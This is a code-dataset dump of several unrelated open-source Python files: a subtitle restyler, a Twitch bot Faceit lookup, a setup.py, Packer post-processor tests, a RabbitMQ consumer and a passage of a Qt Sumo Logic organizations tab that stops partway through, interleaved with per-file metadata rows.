| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.157895
| false
| 0
| 0
| 0
| 0.157895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
758b72cef82f8f852b093d91ef15a93d7537c56c
| 3,758
|
py
|
Python
|
ssfunc/fansub.py
|
End-of-Eternity/ssfunc
|
5adbd5602ebc1db1a3cc3483c759c936d24ad705
|
[
"MIT"
] | 3
|
2021-07-20T22:25:36.000Z
|
2021-12-07T10:05:41.000Z
|
ssfunc/fansub.py
|
End-of-Eternity/ssfunc
|
5adbd5602ebc1db1a3cc3483c759c936d24ad705
|
[
"MIT"
] | null | null | null |
ssfunc/fansub.py
|
End-of-Eternity/ssfunc
|
5adbd5602ebc1db1a3cc3483c759c936d24ad705
|
[
"MIT"
] | 1
|
2021-09-20T19:09:55.000Z
|
2021-09-20T19:09:55.000Z
|
import ass
import subdigest
import subprocess
import os
def dump_subs(subsfile: str, subsdata: subdigest.Subtitles):
"""
Exports subsdata to subsfile manually over using dump_file() to avoid the utf-8 encode warning.
"""
with open(subsfile, "w", encoding="utf_8_sig") as f:
for section in subsdata.sections.values():
f.write("\n".join(section.dump()))
f.write("\n\n")
def load_subs(subsfile: str):
"""
Loads up and parses subtitles from subsfile and returns subsdigest object.
"""
with open(subsfile, encoding="utf_8_sig") as f:
subsdata = subdigest.Subtitles(ass.parse(f), subsfile)
return subsdata
def crunchy_unroll(infile: str = None, styles: str = None):
"""
Restyles Crunchyroll subtitles using an external `styles` file.
"""
from util import get_episode_number
if infile.endswith(".ass"):
print("Processing subtitles.")
elif infile.endswith(".mkv"):
print("Demuxing subtitles")
subprocess.run(["mkvextract", "-q", "tracks", infile, f"2:{infile}.ass"])
infile += ".ass"
print("Processing subtitles.")
subs = load_subs(infile)
# Crunchyroll bad
subs.selection_set("style", "Top$")
subs.modify_field("text", "^", r"{\\an8}")
subs.modify_field("text", "}{", "")
subs.selection_set("style", "^Italics")
subs.modify_field("text", "^", r"{\\i1}")
subs.modify_field("text", "}{", "")
subs.selection_set("style", "^Main")
subs.modify_field("style", "^.*", "Dialogue")
subs.selection_set("style", "^Flashback")
subs.modify_field("style", "^.*", "Flashback")
subs.selection_set("style", "Top$")
subs.modify_field("style", "^.*", "Alt")
subs.selection_set("style", "^Italics")
subs.modify_field("style", "^.*", "Dialogue")
# nuke \N tags
subs.modify_field("text", r"\s*{\\i0}\s*\\N\s*{\\i1}\s*", " ")
subs.modify_field("text", r"\s*\\[Nn]\s*", " ")
subs.modify_field("text", r"\s*\\[Nn]", " ")
subs.modify_field("text", r"\\[Nn]\s*", " ")
subs.modify_field("text", r"\\[Nn]", " ")
# misc
subs.modify_field("text", "--", "—")
subs.use_styles()
subs.set_script_info("YCbCr Matrix", "TV.709")
subs.set_script_info("Script Updated By", "SeaSmoke")
# dump subs to temp file
ep = get_episode_number(infile)
temp = f"{ep}_temp.ass"
dump_subs(temp, subs)
# Loading video for resampling
video = infile.replace(".ass", "")
# Resampling subs using aegisub-cli
subprocess.run(["aegisub-cli", "--video", video, temp, temp, "tool/resampleres"])
# Copying styles from `styles` using prass
subprocess.run(
[
"python",
"-m",
"prass",
"copy-styles",
"--from",
styles,
"--to",
temp,
"-o",
temp,
]
)
# export subs file
subs = load_subs(temp)
dump_subs(infile.replace(".ass", "_fixed.ass"), subs)
# mux subs back into video
subprocess.run(
[
"mkvmerge",
"-o",
infile.replace(".ass", "").replace(".mkv", "_fixed.mkv"),
"-S",
"-A",
"--language",
"0:und",
video,
"-D",
"-S",
"--language",
"1:jpn",
video,
"-D",
"-A",
"--language",
"0:en",
"--track-name",
"0:[Smoke]",
infile.replace(".ass", "_fixed.ass"),
]
)
# Removing temporary files
os.remove(temp)
os.remove(infile)
os.remove(infile.replace(".ass", "_fixed.ass"))
print("Done!")
| 26.842857
| 99
| 0.537254
| 424
| 3,758
| 4.65566
| 0.34434
| 0.070922
| 0.106383
| 0.096251
| 0.251266
| 0.188956
| 0.148936
| 0.137285
| 0
| 0
| 0
| 0.005535
| 0.278872
| 3,758
| 139
| 100
| 27.035971
| 0.722509
| 0.123204
| 0
| 0.284211
| 0
| 0
| 0.20679
| 0.008333
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031579
| false
| 0
| 0.052632
| 0
| 0.094737
| 0.042105
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
758bfb17d11799615d242c0ec597dafd07b4d3fa
| 1,955
|
py
|
Python
|
tbot/twitch_bot/functions/faceit.py
|
thomaserlang/tbot
|
99cfa204d86ef35cf2cc9482ae5a44abb35b443a
|
[
"MIT"
] | null | null | null |
tbot/twitch_bot/functions/faceit.py
|
thomaserlang/tbot
|
99cfa204d86ef35cf2cc9482ae5a44abb35b443a
|
[
"MIT"
] | 10
|
2022-02-14T11:40:20.000Z
|
2022-03-09T22:44:03.000Z
|
tbot/twitch_bot/functions/faceit.py
|
thomaserlang/tbot
|
99cfa204d86ef35cf2cc9482ae5a44abb35b443a
|
[
"MIT"
] | 1
|
2020-09-19T16:38:24.000Z
|
2020-09-19T16:38:24.000Z
|
import logging
from tbot.twitch_bot.var_filler import fills_vars, Send_error
from tbot import config
@fills_vars('faceit.username', 'faceit.elo', 'faceit.level',
'faceit.next_level_points', 'faceit.next_level')
async def faceit_elo(bot, channel, args, var_args, **kwargs):
if not var_args or \
not 'faceit.username' in var_args or \
not var_args['faceit.username']:
raise Send_error('{faceit.username <username>} is missing')
params = {
'nickname': var_args['faceit.username'][0]
}
headers = {
'Authorization': f'Bearer {config["faceit_apikey"]}',
}
elos = (
(1, '1'),
(801, '2'),
(951, '3'),
(1101, '4'),
(1251, '5'),
(1401, '6'),
(1551, '7'),
(1701, '8'),
(1851, '9'),
(2001, '10'),
)
async with bot.ahttp.get('https://open.faceit.com/data/v4/players', params=params, headers=headers) as r:
if r.status == 404:
raise Send_error('Unknow user on Faceit (usernames are case sensitive)')
elif r.status >= 400:
error = await r.text()
raise Send_error(f'Faceit error: {error}')
d = await r.json()
if 'csgo' not in d['games']:
raise Send_error('The user does not have CSGO in their Faceit profile')
next_level_points = 0
next_level = 'unknown'
for i, e in enumerate(elos):
if e[0] < d['games']['csgo']['faceit_elo']:
if i+1 < len(elos):
next_level = elos[i+1][1]
next_level_points = elos[i+1][0] - d['games']['csgo']['faceit_elo']
return {
'faceit.username': '',
'faceit.elo': d['games']['csgo']['faceit_elo'],
'faceit.level': d['games']['csgo']['skill_level_label'],
'faceit.next_level_points': next_level_points,
'faceit.next_level': next_level,
}
| 34.298246
| 109
| 0.544246
| 247
| 1,955
| 4.161943
| 0.408907
| 0.087549
| 0.072957
| 0.046693
| 0.115759
| 0.097276
| 0
| 0
| 0
| 0
| 0
| 0.044364
| 0.296675
| 1,955
| 57
| 110
| 34.298246
| 0.703273
| 0
| 0
| 0
| 0
| 0
| 0.289366
| 0.037321
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.058824
| 0
| 0.078431
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
758d3ae4874f3aae353700d2388d8c12f38f9087
| 740
|
py
|
Python
|
setup.py
|
nickzhuang0613/BaiduSpider
|
f7c2dfc917c8617a8f5f3691bac642c376faed0f
|
[
"MIT"
] | 1
|
2021-03-13T04:35:34.000Z
|
2021-03-13T04:35:34.000Z
|
setup.py
|
nickzhuang0613/BaiduSpider
|
f7c2dfc917c8617a8f5f3691bac642c376faed0f
|
[
"MIT"
] | null | null | null |
setup.py
|
nickzhuang0613/BaiduSpider
|
f7c2dfc917c8617a8f5f3691bac642c376faed0f
|
[
"MIT"
] | null | null | null |
import setuptools
with open('README.md', 'r', encoding='utf-8') as fh:
long_description = fh.read()
setuptools.setup(
name='BaiduSpider',
version='0.0.6',
author='Sam Zhang',
author_email='samzhang951@outlook.com',
description='BaiduSpider,一个爬取百度的利器',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/BaiduSpider/BaiduSpider',
packages=setuptools.find_packages(),
classifiers=[
'Programming Language :: Python :: 3',
'License :: OSI Approved :: MIT License',
'Development Status :: 3 - Alpha'
],
python_requires='>=3.6',
install_requires=[
'requests',
'bs4',
'htmlmin'
]
)
| 26.428571
| 53
| 0.636486
| 78
| 740
| 5.910256
| 0.705128
| 0.130152
| 0.08243
| 0.130152
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02069
| 0.216216
| 740
| 27
| 54
| 27.407407
| 0.774138
| 0
| 0
| 0
| 0
| 0
| 0.359459
| 0.059459
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.04
| 0
| 0.04
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
759471eca6eb7bbbb400247ad8d624471bce9b4f
| 979
|
py
|
Python
|
tests/packerlicious/test_post_processor_docker.py
|
gnewson/packerlicious
|
9a5373bc3a63f949e7912dad0214340d5fddbd85
|
[
"Apache-2.0"
] | 109
|
2017-07-17T03:32:09.000Z
|
2022-02-27T18:24:18.000Z
|
tests/packerlicious/test_post_processor_docker.py
|
gnewson/packerlicious
|
9a5373bc3a63f949e7912dad0214340d5fddbd85
|
[
"Apache-2.0"
] | 175
|
2017-07-16T21:41:40.000Z
|
2021-03-19T22:28:19.000Z
|
tests/packerlicious/test_post_processor_docker.py
|
gnewson/packerlicious
|
9a5373bc3a63f949e7912dad0214340d5fddbd85
|
[
"Apache-2.0"
] | 68
|
2017-07-16T20:52:38.000Z
|
2022-01-08T18:24:17.000Z
|
import pytest
import packerlicious.post_processor as post_processor
class TestDockerImportPostProcessor(object):
def test_required_fields_missing(self):
b = post_processor.DockerImport()
with pytest.raises(ValueError) as excinfo:
b.to_dict()
assert 'required' in str(excinfo.value)
class TestDockerPushPostProcessor(object):
def test_no_required_fields(self):
b = post_processor.DockerPush()
b.to_dict()
class TestDockerSavePostProcessor(object):
def test_required_fields_missing(self):
b = post_processor.DockerSave()
with pytest.raises(ValueError) as excinfo:
b.to_dict()
assert 'required' in str(excinfo.value)
class TestDockerTagPostProcessor(object):
def test_required_fields_missing(self):
b = post_processor.DockerTag()
with pytest.raises(ValueError) as excinfo:
b.to_dict()
assert 'required' in str(excinfo.value)
| 23.309524
| 53
| 0.694586
| 109
| 979
| 6.036697
| 0.311927
| 0.118541
| 0.079027
| 0.109422
| 0.585106
| 0.585106
| 0.585106
| 0.585106
| 0.585106
| 0.585106
| 0
| 0
| 0.223698
| 979
| 41
| 54
| 23.878049
| 0.865789
| 0
| 0
| 0.541667
| 0
| 0
| 0.024515
| 0
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.166667
| false
| 0
| 0.166667
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7598e6392d65a78f154a1a2db4cb51bdef6f7043
| 3,017
|
py
|
Python
|
app/app.py
|
jemarulanda/microservicioMapeo
|
fbf3cef57a0a8aec611171460f4a3434339aa0fe
|
[
"MIT"
] | null | null | null |
app/app.py
|
jemarulanda/microservicioMapeo
|
fbf3cef57a0a8aec611171460f4a3434339aa0fe
|
[
"MIT"
] | null | null | null |
app/app.py
|
jemarulanda/microservicioMapeo
|
fbf3cef57a0a8aec611171460f4a3434339aa0fe
|
[
"MIT"
] | null | null | null |
'''Module main'''
import json
import os
from rabbitmq import RabbitMQ
from pika import exceptions
from parameter import Parameter
from send_grid import SendGrid
from traceability import Traceability
from transform import Transform
import uuid
class App:
'''class Application'''
@classmethod
def __init__(cls):
'''Method init'''
cls.accountName = os.getenv('ACCOUNT_NAME')
print('cls.accountName ',cls.accountName)
#cls.accountKey = os.getenv('ACCOUNT_KEY')
print('cls.accountKey ', cls.accountKey )
cls.config = Parameter(cls.accountName, cls.accountKey).get_parameters()
@classmethod
def callback(cls, channel, method, properties, body):
'''Receive message '''
try:
del properties
transaction_id = str(uuid.uuid4())
businessKey = cls.config['traceability']['businessKey']
data = json.loads(body.decode('utf-8'))
#print(data)
#ibmmq(**cls.config['traceability']).send_json('message')
#Traceability(**cls.config['traceability']).save(
# businessKey,transaction_id,"Desencolar topico",
# "Subscriber-Callback", "IN", str(data),
# "OK", "Mensaje recibido")
print('Transform.transformacion(data)', Transform.transformacion(data))
except Exception as error:
print(error)
SendGrid().create_message(
cls.config['sendGrid']['apiKey'],
cls.config['sendGrid']['fromEmail'],
cls.config['sendGrid']['toEmail'],
str(error))
#Traceability(**cls.config['traceability']).save(
# businessKey,transaction_id,"Error en la calidad del mensaje enviado",
# "Subscriber", "IN", str(body),
# "ERROR", "Lectura Fallida, "+str(error))
finally:
channel.basic_ack(delivery_tag=method.delivery_tag)
@classmethod
def main(cls):
while True:
try:
objqueue = RabbitMQ(**cls.config['source'])
objqueue.connect()
objqueue.channel.basic_consume(
queue=cls.config['source']['queue'],
on_message_callback=cls.callback,
auto_ack=False
)
#cls.traceability = Traceability(**cls.config['traceability'])
try:
objqueue.channel.start_consuming()
except KeyboardInterrupt:
objqueue.disconnect()
objqueue.channel.stop_consuming()
break
except (exceptions.ConnectionClosedByBroker,exceptions.AMQPChannelError,exceptions.AMQPConnectionError) as error_connection:
print('Conexion cerrada con a RabbitMQ', error_connection)
continue
if __name__ == '__main__':
App().main()
| 38.679487
| 136
| 0.569108
| 269
| 3,017
| 6.263941
| 0.39777
| 0.058754
| 0.062315
| 0.058754
| 0.072404
| 0.072404
| 0.072404
| 0.072404
| 0
| 0
| 0
| 0.000973
| 0.318528
| 3,017
| 77
| 137
| 39.181818
| 0.81858
| 0.201525
| 0
| 0.109091
| 0
| 0
| 0.085402
| 0.012621
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054545
| false
| 0
| 0.163636
| 0
| 0.236364
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
759923fc156d69b7e7b7231814ffe05abf19e1c1
| 26,488
|
py
|
Python
|
modules/organizations_tab.py
|
scrummastermind/sumologictoolbox
|
02d9acb970943521685091d36b8d5135e817c22c
|
[
"Apache-2.0"
] | null | null | null |
modules/organizations_tab.py
|
scrummastermind/sumologictoolbox
|
02d9acb970943521685091d36b8d5135e817c22c
|
[
"Apache-2.0"
] | null | null | null |
modules/organizations_tab.py
|
scrummastermind/sumologictoolbox
|
02d9acb970943521685091d36b8d5135e817c22c
|
[
"Apache-2.0"
] | null | null | null |
class_name = 'organizations_tab'
from qtpy import QtCore, QtGui, QtWidgets, uic
import os
from logzero import logger
import pathlib
import json
from modules.sumologic_orgs import SumoLogic_Orgs
class CreateOrUpdateOrgDialog(QtWidgets.QDialog):
def __init__(self, deployments, org_details=None, trials_enabled=False):
super(CreateOrUpdateOrgDialog, self).__init__()
self.deployments = deployments
self.available_org_licenses = ["Paid"]
if trials_enabled and not org_details:
self.available_org_licenses.append("Trial")
self.org_details = org_details
self.setupUi(self)
def setupUi(self, Dialog):
Dialog.setObjectName("CreateOrg")
self.intValidator = QtGui.QIntValidator()
self.setWindowTitle('Enter Org Details')
QBtn = QtWidgets.QDialogButtonBox.Ok | QtWidgets.QDialogButtonBox.Cancel
self.buttonBox = QtWidgets.QDialogButtonBox(QBtn)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
self.labelOrgName = QtWidgets.QLabel(Dialog)
self.labelOrgName.setObjectName("OrgName")
self.labelOrgName.setText('Organization Name:')
self.lineEditOrgName = QtWidgets.QLineEdit(Dialog)
self.layoutOrgName = QtWidgets.QHBoxLayout()
self.layoutOrgName.addWidget(self.labelOrgName)
self.layoutOrgName.addWidget(self.lineEditOrgName)
self.labelEmail = QtWidgets.QLabel(Dialog)
self.labelEmail.setObjectName("Email")
self.labelEmail.setText('Registration Email:')
self.lineEditEmail = QtWidgets.QLineEdit(Dialog)
self.layoutEmail = QtWidgets.QHBoxLayout()
self.layoutEmail.addWidget(self.labelEmail)
self.layoutEmail.addWidget(self.lineEditEmail)
self.labelFirstName = QtWidgets.QLabel(Dialog)
self.labelFirstName.setObjectName("FirstName")
self.labelFirstName.setText('First Name:')
self.lineEditFirstName = QtWidgets.QLineEdit(Dialog)
self.layoutFirstName = QtWidgets.QHBoxLayout()
self.layoutFirstName.addWidget(self.labelFirstName)
self.layoutFirstName.addWidget(self.lineEditFirstName)
self.labelLastName = QtWidgets.QLabel(Dialog)
self.labelLastName.setObjectName("LastName")
self.labelLastName.setText('Last Name:')
self.lineEditLastName = QtWidgets.QLineEdit(Dialog)
self.layoutLastName = QtWidgets.QHBoxLayout()
self.layoutLastName.addWidget(self.labelLastName)
self.layoutLastName.addWidget(self.lineEditLastName)
self.labelDeployment = QtWidgets.QLabel(Dialog)
self.labelDeployment.setObjectName("Deployment")
self.labelDeployment.setText('Deployment:')
self.comboBoxDeployment = QtWidgets.QComboBox(Dialog)
for deployment in self.deployments:
self.comboBoxDeployment.addItem(deployment['deploymentId'].strip())
self.layoutDeployment = QtWidgets.QHBoxLayout()
self.layoutDeployment.addWidget(self.labelDeployment)
self.layoutDeployment.addWidget(self.comboBoxDeployment)
self.labelLicenseType = QtWidgets.QLabel(Dialog)
self.labelLicenseType.setObjectName("LicenseType")
self.labelLicenseType.setText('License Type:')
self.comboBoxLicenseType = QtWidgets.QComboBox(Dialog)
for license in self.available_org_licenses:
self.comboBoxLicenseType.addItem(license.strip())
self.layoutLicenseType = QtWidgets.QHBoxLayout()
self.layoutLicenseType.addWidget(self.labelLicenseType)
self.layoutLicenseType.addWidget(self.comboBoxLicenseType)
self.labelTrialLength = QtWidgets.QLabel(Dialog)
self.labelTrialLength.setObjectName('TrialLength')
self.labelTrialLength.setText('Trial Length')
self.lineEditTrialLength = QtWidgets.QLineEdit(Dialog)
# Temporarily Disabled for V1 of Orgs. Trial length is fixed at 45 days
self.lineEditTrialLength.setText('45')
self.lineEditTrialLength.setReadOnly(True)
self.layoutTrialLength = QtWidgets.QHBoxLayout()
self.layoutTrialLength.addWidget(self.labelTrialLength)
self.layoutTrialLength.addWidget(self.lineEditTrialLength)
if self.org_details:
self.lineEditOrgName.setText(self.org_details['organizationName'])
self.lineEditOrgName.setReadOnly(True)
self.lineEditEmail.setText(self.org_details['email'])
self.lineEditEmail.setReadOnly(True)
self.lineEditFirstName.setText(self.org_details['firstName'])
self.lineEditFirstName.setReadOnly(True)
self.lineEditLastName.setText(self.org_details['lastName'])
self.lineEditLastName.setReadOnly(True)
index = self.comboBoxLicenseType.findText(self.org_details['subscription']['plan']['planName'],
QtCore.Qt.MatchFixedString)
if index >= 0:
self.comboBoxLicenseType.setCurrentIndex(index)
self.comboBoxLicenseType.setEditable(False)
self.layout = QtWidgets.QVBoxLayout()
self.layout.addLayout(self.layoutOrgName)
self.layout.addLayout(self.layoutEmail)
self.layout.addLayout(self.layoutFirstName)
self.layout.addLayout(self.layoutLastName)
self.layout.addLayout(self.layoutDeployment)
self.layout.addLayout(self.layoutLicenseType)
self.layout.addLayout(self.layoutTrialLength)
# Continuous
self.labelContinuousTierIngest = QtWidgets.QLabel(Dialog)
self.labelContinuousTierIngest.setObjectName("ContinuousTierIngest")
self.labelContinuousTierIngest.setText('Continuous Tier Ingest (0 - 1,000,000 GB/day):')
self.lineEditContinuousTierIngest = QtWidgets.QLineEdit(Dialog)
self.lineEditContinuousTierIngest.setValidator(self.intValidator)
self.layoutContinuousTierIngest = QtWidgets.QHBoxLayout()
self.layoutContinuousTierIngest.addWidget(self.labelContinuousTierIngest)
self.layoutContinuousTierIngest.addWidget(self.lineEditContinuousTierIngest)
self.labelContinuousTierStorage = QtWidgets.QLabel(Dialog)
self.labelContinuousTierStorage.setObjectName("ContinuousTierStorage")
self.labelContinuousTierStorage.setText('Continuous Tier Storage (0 - 1,000,000 GB):')
self.lineEditContinuousTierStorage = QtWidgets.QLineEdit(Dialog)
self.lineEditContinuousTierStorage.setValidator(self.intValidator)
self.layoutContinuousTierStorage = QtWidgets.QHBoxLayout()
self.layoutContinuousTierStorage.addWidget(self.labelContinuousTierStorage)
self.layoutContinuousTierStorage.addWidget(self.lineEditContinuousTierStorage)
# Frequent
self.labelFrequentTierIngest = QtWidgets.QLabel(Dialog)
self.labelFrequentTierIngest.setObjectName("FrequentTierIngest")
self.labelFrequentTierIngest.setText('Frequent Tier Ingest (0 - 1,000,000 GB/day):')
self.lineEditFrequentTierIngest = QtWidgets.QLineEdit(Dialog)
self.lineEditFrequentTierIngest.setValidator(self.intValidator)
self.layoutFrequentTierIngest = QtWidgets.QHBoxLayout()
self.layoutFrequentTierIngest.addWidget(self.labelFrequentTierIngest)
self.layoutFrequentTierIngest.addWidget(self.lineEditFrequentTierIngest)
self.labelFrequentTierStorage = QtWidgets.QLabel(Dialog)
self.labelFrequentTierStorage.setObjectName("FrequentTierStorage")
self.labelFrequentTierStorage.setText('Frequent Tier Storage (0 - 1,000,000 GB):')
self.lineEditFrequentTierStorage = QtWidgets.QLineEdit(Dialog)
self.lineEditFrequentTierStorage.setValidator(self.intValidator)
self.layoutFrequentTierStorage = QtWidgets.QHBoxLayout()
self.layoutFrequentTierStorage.addWidget(self.labelFrequentTierStorage)
self.layoutFrequentTierStorage.addWidget(self.lineEditFrequentTierStorage)
# Infrequent
self.labelInFrequentTierIngest = QtWidgets.QLabel(Dialog)
self.labelInFrequentTierIngest.setObjectName("InFrequentTierIngest")
self.labelInFrequentTierIngest.setText('InFrequent Tier Ingest (0 - 1,000,000 GB/day):')
self.lineEditInFrequentTierIngest = QtWidgets.QLineEdit(Dialog)
self.lineEditInFrequentTierIngest.setValidator(self.intValidator)
self.layoutInFrequentTierIngest = QtWidgets.QHBoxLayout()
self.layoutInFrequentTierIngest.addWidget(self.labelInFrequentTierIngest)
self.layoutInFrequentTierIngest.addWidget(self.lineEditInFrequentTierIngest)
self.labelInFrequentTierStorage = QtWidgets.QLabel(Dialog)
self.labelInFrequentTierStorage.setObjectName("InFrequentTierStorage")
self.labelInFrequentTierStorage.setText('InFrequent Tier Storage (0 - 1,000,000 GB):')
self.lineEditInFrequentTierStorage = QtWidgets.QLineEdit(Dialog)
self.lineEditInFrequentTierStorage.setValidator(self.intValidator)
self.layoutInFrequentTierStorage = QtWidgets.QHBoxLayout()
self.layoutInFrequentTierStorage.addWidget(self.labelInFrequentTierStorage)
self.layoutInFrequentTierStorage.addWidget(self.lineEditInFrequentTierStorage)
# Metrics
self.labelMetrics = QtWidgets.QLabel(Dialog)
self.labelMetrics.setObjectName("Metrics")
self.labelMetrics.setText('Metrics Ingest (0 - 100,000 DPM):')
self.lineEditMetrics = QtWidgets.QLineEdit(Dialog)
self.lineEditMetrics.setValidator(self.intValidator)
self.layoutMetrics = QtWidgets.QHBoxLayout()
self.layoutMetrics.addWidget(self.labelMetrics)
self.layoutMetrics.addWidget(self.lineEditMetrics)
# CSE
self.labelCSEIngest = QtWidgets.QLabel(Dialog)
self.labelCSEIngest.setObjectName("CSEIngest")
self.labelCSEIngest.setText('CSE Ingest (0 - 1,000,000 GB/day):')
self.lineEditCSEIngest = QtWidgets.QLineEdit(Dialog)
self.lineEditCSEIngest.setValidator(self.intValidator)
self.layoutCSEIngest = QtWidgets.QHBoxLayout()
self.layoutCSEIngest.addWidget(self.labelCSEIngest)
self.layoutCSEIngest.addWidget(self.lineEditCSEIngest)
self.labelCSEStorage = QtWidgets.QLabel(Dialog)
self.labelCSEStorage.setObjectName("CSEStorage")
self.labelCSEStorage.setText('CSE Storage (0 - 1,000,000 GB):')
self.lineEditCSEStorage = QtWidgets.QLineEdit(Dialog)
self.lineEditCSEStorage.setValidator(self.intValidator)
self.layoutCSEStorage = QtWidgets.QHBoxLayout()
self.layoutCSEStorage.addWidget(self.labelCSEStorage)
self.layoutCSEStorage.addWidget(self.lineEditCSEStorage)
if self.org_details:
self.lineEditContinuousTierIngest.setText(str(self.org_details['subscription']['baselines']['continuousIngest']))
self.lineEditContinuousTierStorage.setText(str(self.org_details['subscription']['baselines']['continuousStorage']))
self.lineEditFrequentTierIngest.setText(str(self.org_details['subscription']['baselines']['frequentIngest']))
self.lineEditFrequentTierStorage.setText(str(self.org_details['subscription']['baselines']['frequentStorage']))
self.lineEditInFrequentTierIngest.setText(str(self.org_details['subscription']['baselines']['infrequentIngest']))
self.lineEditInFrequentTierStorage.setText(str(self.org_details['subscription']['baselines']['infrequentStorage']))
self.lineEditCSEIngest.setText(str(self.org_details['subscription']['baselines']['cseIngest']))
self.lineEditCSEStorage.setText(str(self.org_details['subscription']['baselines']['cseStorage']))
self.lineEditMetrics.setText(str(self.org_details['subscription']['baselines']['metrics']))
else:
self.lineEditContinuousTierIngest.setText('0')
self.lineEditContinuousTierStorage.setText('0')
self.lineEditFrequentTierIngest.setText('0')
self.lineEditFrequentTierStorage.setText('0')
self.lineEditInFrequentTierIngest.setText('0')
self.lineEditInFrequentTierStorage.setText('0')
self.lineEditMetrics.setText('0')
self.lineEditCSEIngest.setText('0')
self.lineEditCSEStorage.setText('0')
self.layout.addLayout(self.layoutContinuousTierIngest)
self.layout.addLayout(self.layoutContinuousTierStorage)
self.layout.addLayout(self.layoutFrequentTierIngest)
self.layout.addLayout(self.layoutFrequentTierStorage)
self.layout.addLayout(self.layoutInFrequentTierIngest)
self.layout.addLayout(self.layoutInFrequentTierStorage)
self.layout.addLayout(self.layoutMetrics)
self.layout.addLayout(self.layoutCSEIngest)
self.layout.addLayout(self.layoutCSEStorage)
self.createPresetCheckbox = QtWidgets.QCheckBox("Create Credential Preset")
self.createPresetCheckbox.setChecked(True)
self.writeCredsToFileCheckbox = QtWidgets.QCheckBox("Write Credentials to File")
self.writeCredsToFileCheckbox.setChecked(False)
if not self.org_details:
self.layoutCheckboxes = QtWidgets.QHBoxLayout()
self.layoutCheckboxes.addWidget(self.createPresetCheckbox)
self.layoutCheckboxes.addWidget(self.writeCredsToFileCheckbox)
self.layout.addLayout(self.layoutCheckboxes)
self.layout.addWidget(self.buttonBox)
self.setLayout(self.layout)
return
def getresults(self):
results = {'organizationName': str(self.lineEditOrgName.text()),
'firstName': str(self.lineEditFirstName.text()),
'lastName': str(self.lineEditLastName.text()),
'email': str(self.lineEditEmail.text()),
'deploymentId': str(self.comboBoxDeployment.currentText()),
'baselines': {}
}
results['baselines']['continuousIngest'] = str(self.lineEditContinuousTierIngest.text())
results['baselines']['continuousStorage'] = str(self.lineEditContinuousTierStorage.text())
results['baselines']['frequentIngest'] = str(self.lineEditFrequentTierIngest.text())
results['baselines']['frequentStorage'] = str(self.lineEditFrequentTierStorage.text())
results['baselines']['infrequentIngest'] = str(self.lineEditInFrequentTierIngest.text())
results['baselines']['infrequentStorage'] = str(self.lineEditInFrequentTierStorage.text())
results['baselines']['metrics'] = self.lineEditMetrics.text()
results['baselines']['cseIngest'] = str(self.lineEditCSEIngest.text())
results['baselines']['cseStorage'] = str(self.lineEditCSEStorage.text())
if self.comboBoxLicenseType.currentText() == 'Trial':
results['trialPlanPeriod'] = str(self.lineEditTrialLength.text())
if not self.org_details:
results['create_preset'] = self.createPresetCheckbox.isChecked()
results['write_creds_to_file'] = self.writeCredsToFileCheckbox.isChecked()
return results
class organizations_tab(QtWidgets.QWidget):
def __init__(self, mainwindow):
super(organizations_tab, self).__init__()
self.mainwindow = mainwindow
self.tab_name = 'Organizations'
self.cred_usage = 'left'
collector_ui = os.path.join(self.mainwindow.basedir, 'data/organizations.ui')
uic.loadUi(collector_ui, self)
#self.font = "Waree"
#self.font_size = 12
# UI Buttons for Organizations API tab
self.pushButtonGetOrgs.clicked.connect(lambda: self.update_org_list(
str(self.mainwindow.comboBoxRegionLeft.currentText().lower()),
str(self.mainwindow.lineEditUserNameLeft.text()),
str(self.mainwindow.lineEditPasswordLeft.text()),
))
self.pushButtonCreateOrg.clicked.connect(lambda: self.create_org(
str(self.mainwindow.comboBoxRegionLeft.currentText().lower()),
str(self.mainwindow.lineEditUserNameLeft.text()),
str(self.mainwindow.lineEditPasswordLeft.text()),
))
self.pushButtonCancelSubscription.clicked.connect(lambda: self.cancel_subscription(
self.tableWidgetOrgs.selectedItems(),
str(self.mainwindow.comboBoxRegionLeft.currentText().lower()),
str(self.mainwindow.lineEditUserNameLeft.text()),
